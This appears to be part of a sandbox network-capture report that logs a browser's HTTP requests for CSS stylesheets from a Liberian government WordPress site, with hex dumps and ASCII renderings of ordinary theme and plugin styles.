                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 76 61 72 28 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 61 6c 69 67 6e 2c 69 6e 69 74 69 61 6c 29 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 64 69 72 65 63 74 69 6f 6e 2c 69 6e 69 74 69 61 6c 29 3b 66 6c 65 78 2d 77 72 61 70 3a 76 61 72 28 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 77 72 61 70 2c 77 72 61 70 29 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 76 61 72 28 2d 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 6a 75 73 74 69 66 79 2c 69 6e 69 74 69 61 6c 29 7d 2e 77 70
                                                                                                                        Data Ascii: esponsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.74975669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC594OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.2 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:45 UTC360INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 22 Dec 2024 08:44:45 GMT
                                                                                                                        ETag: "b4e-629d7e4540abf"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2894
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:44 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:45 UTC2894INData Raw: 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f
                                                                                                                        Data Ascii: .wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);clip-path: inset(50%);height: 1px;width: 1px;margin: -1px;padding: 0;border: 0;word-wrap: normal !important;}.wpcf7 form .wpcf7-respo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.74975869.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC574OUTGET /wp-content/themes/betheme/css/be.css?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:45 UTC364INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "68a77-60e9383bcaa37"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 428663
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:44 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:45 UTC7828INData Raw: 2f 2a 20 52 65 73 65 74 20 26 20 42 61 73 69 63 73 20 2a 2f 0a 0a 68 74 6d 6c 2c 62 6f 64 79 2c 64 69 76 2c 73 70 61 6e 2c 61 70 70 6c 65 74 2c 6f 62 6a 65 63 74 2c 69 66 72 61 6d 65 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 70 72 65 2c 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 63 69 74 65 2c 63 6f 64 65 2c 64 65 6c 2c 64 66 6e 2c 65 6d 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 71 2c 73 2c 73 61 6d 70 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 74 74 2c 76 61 72 2c 62 2c 75 2c 69 2c 63 65 6e 74 65 72 2c 6f 6c 2c 75 6c 2c 6c 69 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 74 61 62 6c 65 2c 63 61 70 74 69 6f 6e 2c 74 62 6f 64 79 2c 74 66 6f
                                                                                                                        Data Ascii: /* Reset & Basics */html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,strike,strong,tt,var,b,u,i,center,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfo
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 73 65 74 22 5d 3a 68 6f 76 65 72 3a 61 66 74 65 72 2c 2e 62 75 74 74 6f 6e 2d 66 6c 61 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 68 6f 76 65 72 3a 61 66 74 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 0a 0a 2f 2a 20 62 75 74 74 6f 6e 20 7c 20 72 6f 75 6e 64 20 2a 2f 0a 0a 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 2e 62 75 74 74 6f 6e 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2c 20 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 2e 61 63 74 69 6f 6e 5f 62 75 74 74 6f 6e 2c 0a 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20
                                                                                                                        Data Ascii: set"]:hover:after,.button-flat input[type="button"]:hover:after{opacity:1}/* button | round */.button-round .button,.button-round button, .button-round .action_button,.button-round input[type="button"],.button-round input[type="reset"],.button-round
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 31 62 27 7d 2e 69 63 6f 6e 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 31 63 27 7d 2e 69 63 6f 6e 2d 62 6f 6f 6b 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 31 64 27 7d 2e 69 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 31 65 27 7d 2e 69 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 31 66 27 7d 2e 69 63 6f 6e 2d 62 6f 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 32 30 27 7d 2e 69 63 6f 6e 2d 62 72 69 65 66 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 32 31 27 7d 2e 69 63 6f 6e 2d 62 72 75 73 68 3a 62
                                                                                                                        Data Ascii: ore{content:'\e81b'}.icon-book:before{content:'\e81c'}.icon-book-open:before{content:'\e81d'}.icon-bookmark:before{content:'\e81e'}.icon-bookmarks:before{content:'\e81f'}.icon-box:before{content:'\e820'}.icon-briefcase:before{content:'\e821'}.icon-brush:b
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 74 3a 27 5c 65 38 65 65 27 7d 2e 69 63 6f 6e 2d 70 61 70 65 72 2d 70 6c 61 6e 65 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 65 66 27 7d 2e 69 63 6f 6e 2d 70 61 72 61 6d 73 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 66 30 27 7d 2e 69 63 6f 6e 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 66 31 27 7d 2e 69 63 6f 6e 2d 70 65 6e 63 69 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 66 32 27 7d 0a 2e 69 63 6f 6e 2d 70 65 6e 63 69 6c 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 66 33 27 7d 2e 69 63 6f 6e 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 38 66 34 27 7d 2e 69 63 6f 6e 2d 70 68 6f 74
                                                                                                                        Data Ascii: t:'\e8ee'}.icon-paper-plane-line:before{content:'\e8ef'}.icon-params-line:before{content:'\e8f0'}.icon-pause:before{content:'\e8f1'}.icon-pencil:before{content:'\e8f2'}.icon-pencil-line:before{content:'\e8f3'}.icon-phone:before{content:'\e8f4'}.icon-phot
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 65 73 73 20 2e 62 62 70 5f 77 69 64 67 65 74 5f 6c 6f 67 69 6e 20 2e 62 62 70 2d 6c 6f 67 67 65 64 2d 69 6e 20 61 2e 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 3a 30 7d 0a 2e 62 62 70 72 65 73 73 20 2e 77 69 64 67 65 74 5f 64 69 73 70 6c 61 79 5f 76 69 65 77 73 20 75 6c 2c 2e 62 62 70 72 65 73 73 20 2e 77 69 64 67 65 74 5f 64 69 73 70 6c 61 79 5f 66 6f 72 75 6d 73 20 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 73 71 75 61 72 65 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 30 20 33 30 70 78 7d 0a 2e 62 62 70 72 65 73 73 20 2e 77 69 64 67 65 74 5f 64 69 73 70 6c 61 79 5f 76 69 65 77 73 20 75 6c 20 6c 69 20 61 2c 2e 62 62 70 72 65 73 73 20 2e 77 69 64 67 65 74 5f 64 69 73 70 6c 61 79 5f 66 6f 72 75 6d 73 20 75 6c 20 6c 69 20 61 7b 64 69 73 70 6c 61 79 3a
                                                                                                                        Data Ascii: ess .bbp_widget_login .bbp-logged-in a.button{margin:0}.bbpress .widget_display_views ul,.bbpress .widget_display_forums ul{list-style-type:square;padding:0 0 0 30px}.bbpress .widget_display_views ul li a,.bbpress .widget_display_forums ul li a{display:
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 30 34 33 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 0a 2e 6d 66 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 0a 2e 6d 66 70 2d 63 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 64 69 73 70 6c
                                                                                                                        Data Ascii: :100%;z-index:9043;position:fixed;outline:none!important;-webkit-backface-visibility:hidden}.mfp-container{text-align:center;position:absolute;width:100%;height:100%;left:0;top:0;padding:0 8px;box-sizing:border-box}.mfp-container:before{content:'';displ
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 6e 74 2d 6d 65 74 61 2e 70 72 69 6d 61 72 79 2c 0a 2e 74 72 69 62 65 2d 65 76 65 6e 74 73 2d 65 76 65 6e 74 2d 6d 65 74 61 2e 73 65 63 6f 6e 64 61 72 79 20 7b 20 66 6c 65 78 2d 67 72 6f 77 3a 20 31 3b 20 7d 0a 0a 2e 74 72 69 62 65 2d 65 76 65 6e 74 73 2d 65 76 65 6e 74 2d 6d 65 74 61 20 64 74 20 7b 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 20 66 6c 6f 61 74 3a 20 75 6e 73 65 74 3b 20 7d 0a 2e 74 72 69 62 65 2d 65 76 65 6e 74 73 2d 65 76 65 6e 74 2d 6d 65 74 61 20 64 64 2c 0a 2e 74 72 69 62 65 2d 65 76 65 6e 74 73 2d 65 76 65 6e 74 2d 6d 65 74 61 20 64 74 20 7b 20 62 6f 72 64 65 72 3a 20 30 3b 20 7d 0a 0a 2e 74 72 69 62 65 2d 65 76 65 6e 74 73 20 2e 64 61 74 65 70 69 63 6b 65 72 20 74 68 2c 0a 2e 74 72 69 62 65 2d 65 76 65 6e 74 73 20 2e 64 61 74 65 70 69 63
                                                                                                                        Data Ascii: nt-meta.primary,.tribe-events-event-meta.secondary { flex-grow: 1; }.tribe-events-event-meta dt { width: auto; float: unset; }.tribe-events-event-meta dd,.tribe-events-event-meta dt { border: 0; }.tribe-events .datepicker th,.tribe-events .datepic
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 09 09 09 09 09 09 7b 20 77 69 64 74 68 3a 20 32 35 25 3b 20 7d 09 09 09 2f 2a 20 31 2f 34 20 2a 2f 0a 2e 6f 6e 65 2d 74 68 69 72 64 2e 63 6f 6c 75 6d 6e 09 09 09 09 7b 20 77 69 64 74 68 3a 20 33 33 2e 33 33 33 25 3b 20 7d 09 2f 2a 20 31 2f 33 20 2a 2f 0a 2e 74 77 6f 2d 66 69 66 74 68 2e 63 6f 6c 75 6d 6e 09 09 09 09 7b 20 77 69 64 74 68 3a 20 34 30 25 3b 20 7d 09 09 09 2f 2a 20 32 2f 35 20 2a 2f 0a 0a 2e 6f 6e 65 2d 73 65 63 6f 6e 64 2e 63 6f 6c 75 6d 6e 09 09 09 7b 20 77 69 64 74 68 3a 20 35 30 25 3b 20 7d 09 09 09 2f 2a 20 31 2f 32 20 2a 2f 0a 2e 74 68 72 65 65 2d 66 69 66 74 68 2e 63 6f 6c 75 6d 6e 09 09 09 7b 20 77 69 64 74 68 3a 20 36 30 25 3b 20 7d 09 09 09 2f 2a 20 33 2f 35 20 2a 2f 0a 2e 74 77 6f 2d 74 68 69 72 64 2e 63 6f 6c 75 6d 6e 09 09 09 09
                                                                                                                        Data Ascii: { width: 25%; }/* 1/4 */.one-third.column{ width: 33.333%; }/* 1/3 */.two-fifth.column{ width: 40%; }/* 2/5 */.one-second.column{ width: 50%; }/* 1/2 */.three-fifth.column{ width: 60%; }/* 3/5 */.two-third.column
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 6b 3b 77 69 64 74 68 3a 38 70 78 3b 68 65 69 67 68 74 3a 38 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 31 70 78 3b 74 6f 70 3a 2d 33 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 36 44 36 44 36 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 7d 0a 0a 2f 2a 20 53 6c 69 64 65 72 20 52 65 76 6f 6c 75 74 69 6f 6e 20 2a 2f 0a 0a 2e 6d 66 6e 2d 72 65 76 2d 73 6c 69 64 65 72 20 69 6e 70 75 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 0a 2e 72 73 2d 70 2d
                                                                                                                        Data Ascii: k;width:8px;height:8px;-webkit-border-radius:1px;border-radius:1px;position:absolute;left:1px;top:-3px;background:#D6D6D6;-webkit-transform:rotate(45deg);transform:rotate(45deg)}/* Slider Revolution */.mfn-rev-slider input{display:inline-block}.rs-p-
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 70 72 65 76 3a 66 6f 63 75 73 20 2e 70 68 6f 74 6f 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 0a 09 2e 66 69 78 65 64 2d 6e 61 76 2d 70 72 65 76 3a 66 6f 63 75 73 20 2e 70 68 6f 74 6f 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 0a 09 2e 66 69 78 65 64 2d 6e 61 76 2d 6e 65 78 74 20 2e 70 68 6f 74 6f 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 31 35 70 78 7d 0a 09 2e 66 69 78 65 64 2d 6e 61 76 2d 6e 65 78 74 3a 68 6f 76 65 72 20 2e 70 68 6f 74 6f 2c 0a 09 2e 66 69 78 65 64 2d 6e 61 76 2d 6e 65 78 74 3a 66 6f 63 75 73 20 2e 70 68 6f 74 6f 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 0a 7d 0a 0a 2e 66 69 78 65 64 2d 6e 61 76 2e 73 74 79 6c 65 2d 69 6d 61 67 65 73 20 2e 61 72 72 6f 77 7b 64 69 73 70 6c
                                                                                                                        Data Ascii: prev:focus .photo{margin-left:0}.fixed-nav-prev:focus .photo{margin-left:0}.fixed-nav-next .photo{position:static;margin-right:-115px}.fixed-nav-next:hover .photo,.fixed-nav-next:focus .photo{margin-right:0}}.fixed-nav.style-images .arrow{displ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.74975969.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC600OUTGET /wp-content/themes/betheme/assets/animations/animations.min.css?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:45 UTC362INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "e83d-60e9383bc7b56"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 59453
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:44 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:45 UTC7830INData Raw: 2e 61 6e 69 6d 61 74 65 2c 2e 68 6f 76 65 72 2d 62 6f 75 6e 63 65 2c 2e 68 6f 76 65 72 2d 66 6c 61 73 68 2c 2e 68 6f 76 65 72 2d 68 65 61 72 74 62 65 61 74 2c 2e 68 6f 76 65 72 2d 70 61 6e 69 63 2c 2e 68 6f 76 65 72 2d 70 75 6c 73 61 74 65 2c 2e 68 6f 76 65 72 2d 70 75 6c 73 65 2c 2e 68 6f 76 65 72 2d 73 68 61 6b 65 48 2c 2e 68 6f 76 65 72 2d 73 68 61 6b 65 56 2c 2e 68 6f 76 65 72 2d 73 6c 69 6e 67 73 68 6f 74 43 43 57 2c 2e 68 6f 76 65 72 2d 73 6c 69 6e 67 73 68 6f 74 43 57 2c 2e 68 6f 76 65 72 2d 73 70 69 6e 43 43 57 2c 2e 68 6f 76 65 72 2d 73 70 69 6e 43 57 2c 2e 68 6f 76 65 72 2d 73 74 72 6f 62 65 2c 2e 68 6f 76 65 72 2d 74 61 64 61 2c 2e 68 6f 76 65 72 2d 77 61 76 65 2c 2e 68 6f 76 65 72 2d 77 6f 62 62 6c 65 2c 2e 74 72 69 67 67 65 72 7b 2d 77 65 62
                                                                                                                        Data Ascii: .animate,.hover-bounce,.hover-flash,.hover-heartbeat,.hover-panic,.hover-pulsate,.hover-pulse,.hover-shakeH,.hover-shakeV,.hover-slingshotCCW,.hover-slingshotCW,.hover-spinCCW,.hover-spinCW,.hover-strobe,.hover-tada,.hover-wave,.hover-wobble,.trigger{-web
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 70 4c 61 72 67 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 55 70 4c 61 72 67 65 3b 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 55 70 4c 61 72 67 65 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 55 70 4c 61 72 67 65 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 55 70 4c 61 72 67 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 64 65 49 6e 55 70 4c 61 72 67 65 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 44 6f 77 6e 4c 61 72 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 30 30 70
                                                                                                                        Data Ascii: pLarge{-webkit-animation-name:fadeInUpLarge;-moz-animation-name:fadeInUpLarge;-ms-animation-name:fadeInUpLarge;-o-animation-name:fadeInUpLarge;animation-name:fadeInUpLarge}@-webkit-keyframes fadeInDownLarge{0%{opacity:0;-webkit-transform:translateY(-1000p
                                                                                                                        2025-01-10 13:54:45 UTC8000INData Raw: 63 69 74 79 3a 31 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 30 70 78 29 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 4f 75 74 4c 65 66 74 4c 61 72 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 30 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 4f 75 74 4c 65 66 74 4c 61 72 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61
                                                                                                                        Data Ascii: city:1;-ms-transform:translateX(-1000px)}}@-o-keyframes fadeOutLeftLarge{0%{opacity:0;-o-transform:translateX(0)}100%{opacity:1;-o-transform:translateX(-1000px)}}@keyframes fadeOutLeftLarge{0%{opacity:0;transform:translateX(0)}100%{opacity:1;transform:tra
